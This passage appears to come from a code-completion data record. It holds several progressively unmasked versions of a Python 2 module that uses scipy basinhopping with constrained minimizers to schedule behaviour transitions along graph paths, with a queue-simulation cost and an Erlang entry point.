Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n<mask token>\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) of same shape\"\"\"\n return np.array(F)\n\n\n<mask token>\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\n<mask token>\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-2": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': 
bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n<mask token>\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) of same shape\"\"\"\n return np.array(F)\n\n\n<mask token>\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\n<mask token>\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-3": "<mask token>\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': 
bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\ndef parse_edgelist(edges):\n \"\"\"[((a, b), tau)] -> {(a, b): tau}\"\"\"\n return {(a, b): tau for (a, b), tau in edges}\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) 
of same shape\"\"\"\n return np.array(F)\n\n\ndef initial_soln(path, t_max):\n \"\"\"Evenly Distributed, no check for taus\"\"\"\n j = t_max / len(path)\n return np.array([((i + 1) * j) for i in xrange(len(path) - 1)])\n\n\ndef transition_costs(path, btg):\n \"\"\"Sequence of transition costs associated with the prescribed path\"\"\"\n return [btg[path[i], path[i + 1]] for i in xrange(len(path) - 1)]\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.0):\n \"\"\"Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.\"\"\"\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1)\n c_steps = [0] + map(discr_index, costs)\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i +\n 1]) for i in xrange(len(costs) + 1)])\n return result\n\n\ndef obj(times, B, cum_F, costs, dt=1.0):\n \"\"\"Objective Function for Hillclimbing\"\"\"\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-4": "from erlport.erlterms import Atom\nfrom scipy.optimize import basinhopping\nimport numpy as np\nimport qsim\n\n\nclass Bounds(object):\n \"\"\"Required for acceptance testing in scipy.optimize.basinhopping\"\"\"\n\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [(x[i] + c <= x[i + 1]) for i, c in enumerate(self.costs\n [1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs['x_new']\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n \"\"\"Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i\"\"\"\n funs = [(lambda x: x[i + 1] - x[i] + c) for i, c in enumerate(self.\n costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [(lambda x: x[i]) for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n n = len(self.costs)\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n - 1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {'slsqp': {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)\n }, 'cobyla': [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n \"\"\"Return bounds as sequence\"\"\"\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\nclass Stepper(object):\n\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n \"\"\"Erlang Entry Point to Optimization Module\"\"\"\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.0, maxiter=20, Acc0=None,\n method='SLSQP'):\n \"\"\"\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n \"\"\"\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n L, x0, bounds, step_taker = opt_params(path, Behaviour_Table, BTG,\n t_max, F, dt=dt, Acc0=Acc0)\n 
minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds\n (), 'constraints': bounds.SLSQP_constraints()[method.lower()]}\n result = basinhopping(L, x0.copy(), accept_test=bounds, take_step=\n step_taker, stepsize=10 * dt, niter=maxiter, T=initial_T,\n interval=20, minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)), key=lambda\n x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0, q_acc_model=qsim.\n integrator, q_acc_model_args=[], q_model_kwargs={}, q_relief_model=qsim\n .linear_relief, deadtime_penalty=4):\n \"\"\"Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n \"\"\"\n B = np.vstack(BTable[bid] for bid in path)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0.0, (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n \"\"\"Simulate the queue effects, and then evaluate the objective function\n on the simulation result\"\"\"\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=\n BTable, Acc0=Acc0, relief_mode_kwargs={'rate': 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n return -obj(x, B, cum_Z, taus, dt=dt) + 0.25 * avg_rates.dot(Deadtimes\n ) ** 2 - avg_rates.sum() * Acc.sum()\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\ndef parse_edgelist(edges):\n \"\"\"[((a, b), tau)] -> {(a, b): tau}\"\"\"\n return {(a, b): tau for (a, b), tau in edges}\n\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n \"\"\"[(bid, [bvec])] -> {bid: <bvec>}\"\"\"\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\n\ndef parse_prediction(F):\n \"\"\"[[float]] -> np.array(...) 
of same shape\"\"\"\n return np.array(F)\n\n\ndef initial_soln(path, t_max):\n \"\"\"Evenly Distributed, no check for taus\"\"\"\n j = t_max / len(path)\n return np.array([((i + 1) * j) for i in xrange(len(path) - 1)])\n\n\ndef transition_costs(path, btg):\n \"\"\"Sequence of transition costs associated with the prescribed path\"\"\"\n return [btg[path[i], path[i + 1]] for i in xrange(len(path) - 1)]\n\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n \"\"\"Penalty brutally dominates any out-of-index operation...\"\"\"\n z = cum_F.shape[-1] - 1\n if not 0 <= a <= z or not 0 <= b <= z:\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.0):\n \"\"\"Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.\"\"\"\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1)\n c_steps = [0] + map(discr_index, costs)\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i +\n 1]) for i in xrange(len(costs) + 1)])\n return result\n\n\ndef obj(times, B, cum_F, costs, dt=1.0):\n \"\"\"Objective Function for Hillclimbing\"\"\"\n Z = B * flow_served(cum_F, times, costs, dt=dt)\n return Z.sum()\n\n\ndef barrier(times, path, BTG):\n \"\"\"Handles Linear/causality Constraints with respect to transitions\"\"\"\n t = [0] + list(times)\n S = 0.0\n for i in xrange(len(path) - 1):\n edge = path[i], path[i + 1]\n tau = BTG[edge]\n S += min(0, t[i + 1] - t[i] - tau)\n return S\n",
"step-5": "from erlport.erlterms import Atom\nfrom scipy.optimize import basinhopping\nimport numpy as np\nimport qsim\n\nclass Bounds(object):\n '''Required for acceptance testing in scipy.optimize.basinhopping'''\n def __init__(self, xmin, xmax, costs):\n self.xmax = xmax\n self.xmin = xmin\n self.costs = costs\n\n def is_valid(self, x):\n tmax = bool(np.all(x <= self.xmax))\n tmin = bool(np.all(x >= self.xmin))\n in_order = [x[i] + c <= x[i+1] for i, c in enumerate(self.costs[1:])]\n in_order.append(x[0] <= self.costs[0])\n return tmax and tmin and all(in_order)\n\n def __call__(self, **kwargs):\n x = kwargs[\"x_new\"]\n return self.is_valid(x)\n\n def SLSQP_constraints(self):\n '''Return inequality constraints for SLSQP,\n in particular, assert that 0 >= x_i - x_i-1 forall i'''\n funs = [lambda x: x[i + 1] - x[i] + c\n for i, c in enumerate(self.costs[1:])]\n funs.append(lambda x: x[0] + self.costs[0])\n funs += [lambda x: x[i] for i in xrange(len(self.costs))]\n funs += [lambda x: -x[i]]\n\n # im matrix form\n n = len(self.costs)\n # -x_i <= 0\n neg = np.identity(n) * -1\n rhs1 = np.ones(n) * self.xmin\n rhs1[0] += self.costs[0]\n # tmax constraints\n tmax = np.identity(n)\n rhs2 = np.ones(n) * self.xmax\n # cost constraints\n A = np.vstack((neg, tmax))\n b = np.hstack((rhs1, rhs2))\n if n >= 2:\n root = [1, -1] + [0] * (n - 2)\n z = np.vstack([np.roll(root, i) for i in xrange(n-1)])\n rhs3 = np.array(self.costs[1:])\n A = np.vstack((A, z))\n b = np.hstack((b, rhs3))\n return {\"slsqp\": {'type': 'ineq', 'fun': lambda x: b - np.dot(A, x)},\n \"cobyla\": [{'type': 'ineq', 'fun': f} for f in funs]}\n\n def SLSQP_bounds(self):\n '''Return bounds as sequence'''\n return [(self.xmin, self.xmax) for i in xrange(len(self.costs))]\n\n\n\nclass Stepper(object):\n def __init__(self, bounds, stepsize=10, max_iter=20, deflate=0.5):\n self.bounds = bounds\n self.stepsize = stepsize\n self.max_iter = max_iter\n self.deflate = deflate\n\n def __call__(self, x):\n y = None\n for i in xrange(self.max_iter):\n B = self.deflate ** (i + 1)\n r = self.stepsize * B\n u = np.random.uniform(-r, r, x.shape)\n if self.bounds.is_valid(x + u):\n x += u\n return x\n return x\n\n\ndef optimize_path(paths, behaviours, btg, start, prediction, dt, maxiter):\n '''Erlang Entry Point to Optimization Module'''\n B_table = parse_behaviours(behaviours)\n BTG = parse_edgelist(btg)\n F = parse_prediction(prediction)\n\n path, t = best_path(paths, B_table, BTG, F, dt=dt, maxiter=10)\n return list(path), map(lambda x: int(x) + start, t.x)\n\n\ndef best_path(paths, Behaviour_Table, BTG, F, dt=1.,\n maxiter=20, Acc0=None, method=\"SLSQP\"):\n '''\n Perform the mixed ILP optimization (without queues, or memory), that yields\n the optimal behaviour transition through the BTG.\n\n :paths -> iterable of path-iterables, path-domain for optimization\n Each path-iterable contains only behaviour_id.\n :Behaviour_Table -> Dict of the form {behaviour_id: <behaviour_vec>}\n Must contain all behaviours in btg\n :btg -> Behaviour Transition Graph, nodes are behaviour_ids,\n dictionary of the form {(v_1, v_2): tau_1,2}\n :F -> Prediction matrix, of shape (|b_vec|, n),\n where n is int(T_max/dt)\n :dt -> Prediction time-resolution\n :Acc0 -> Initial queue Accumulator (queue length) value, defaults 0.\n '''\n # Given a particular path, find the optimal times to transition\n Acc0 = np.zeros(F.shape[0]) if Acc0 is None else Acc0\n\n Solutions = []\n t_max = int((F.shape[-1] - 1) * dt)\n initial_T = F.sum() / len(paths[0])\n for path in paths:\n 
L, x0, bounds, step_taker = opt_params(path, Behaviour_Table,\n BTG, t_max, F, dt=dt, Acc0=Acc0)\n\n minimizer_kwargs = {'method': method, 'bounds': bounds.SLSQP_bounds(),\n 'constraints': bounds.SLSQP_constraints()[method.lower()],\n }\n result = basinhopping(L, x0.copy(),\n accept_test=bounds,\n take_step=step_taker, stepsize=10*dt,\n niter=maxiter, T=initial_T,\n interval=20,\n minimizer_kwargs=minimizer_kwargs)\n Solutions.append(result)\n\n i, BestPath = min(((i, s) for i, s in enumerate(Solutions)),\n key=lambda x: x[1].fun)\n return paths[i], BestPath\n\n\ndef opt_params(path, BTable, BTG, t_max, F, dt, Acc0,\n q_acc_model=qsim.integrator, q_acc_model_args=[], q_model_kwargs={},\n q_relief_model=qsim.linear_relief,\n deadtime_penalty=4):\n '''Generates the components necessary to completely specify\n best-path optimization routine. (With a queue model)\n\n Returns:\n :Lagrangian Objective Function L(x) -> Contains a Barrier Component\n :x0 -> an initial realizeable solution\n :bounds -> a Bounds() object, that defines surrounding hyper-volume for x\n '''\n B = np.vstack(BTable[bid] for bid in path) # Behaviour Matrix (d,4)\n taus = transition_costs(path, BTG)\n x0 = initial_soln(path, t_max)\n bounds = Bounds(0., (F.shape[-1] - 1) * dt, taus)\n\n def cost(x, p=deadtime_penalty):\n '''Simulate the queue effects, and then evaluate the objective function\n on the simulation result'''\n k = F.shape[1] if F.shape[1] > 0 else 1\n avg_rates = F.sum(1) / k\n Z, Acc = qsim.cascading_relief(F, path, x, costs=taus, BTable=BTable,\n Acc0=Acc0, relief_mode_kwargs={\"rate\": 0.5})\n cum_Z = np.cumsum(Z, axis=1)\n\n Deadtimes = np.where(Z == 0, 0, 1).sum(1)\n\n return (-obj(x, B, cum_Z, taus, dt=dt)\n + 0.25* avg_rates.dot(Deadtimes) ** 2\n - avg_rates.sum()*Acc.sum()) # ????\n\n\n step_taker = Stepper(bounds, 10, 20)\n return cost, x0, bounds, step_taker\n\n\n# Parsers ###############################################################\ndef parse_edgelist(edges):\n '''[((a, b), tau)] -> {(a, b): tau}'''\n return {(a, b): tau for (a, b), tau in edges}\n\ndef parse_behaviours(behaviours, dtype=np.float32):\n '''[(bid, [bvec])] -> {bid: <bvec>}'''\n return {bid: np.array(bvec).sum(1) for bid, bvec in behaviours}\n\ndef parse_prediction(F):\n '''[[float]] -> np.array(...) 
of same shape'''\n return np.array(F) # Might not work, will check back later\n\n\n# Optimization ###############################################################\ndef initial_soln(path, t_max):\n '''Evenly Distributed, no check for taus'''\n j = t_max / len(path)\n return np.array([(i + 1) * j for i in xrange(len(path) - 1)])\n\ndef transition_costs(path, btg):\n '''Sequence of transition costs associated with the prescribed path'''\n return [btg[(path[i], path[i+1])] for i in xrange(len(path) - 1)]\n\ndef range_sum(cum_F, a, b, penalty=-1000):\n '''Penalty brutally dominates any out-of-index operation...'''\n z = cum_F.shape[-1] - 1\n if (not 0 <= a <= z) or (not 0 <= b <= z):\n return np.ones(cum_F.shape[0]) * penalty\n return cum_F[..., b] - cum_F[..., a]\n\ndef flow_served(cum_F, times, costs, queue_model=None, dt=1.):\n '''Times: [t1, ..., td],\n costs: [t_{b0, b1}, t_{b1, b2}, ...]\n Returns the Fulfillment matrix associated with each behaviour segment.'''\n discr_index = lambda x: int(x / dt) - 1\n t_steps = [0] + map(discr_index, times)\n t_steps.append(cum_F.shape[-1] - 1) # t_max\n\n c_steps = [0] + map(discr_index, costs)\n\n result = np.vstack([range_sum(cum_F, t_steps[i] + c_steps[i], t_steps[i + 1])\n for i in 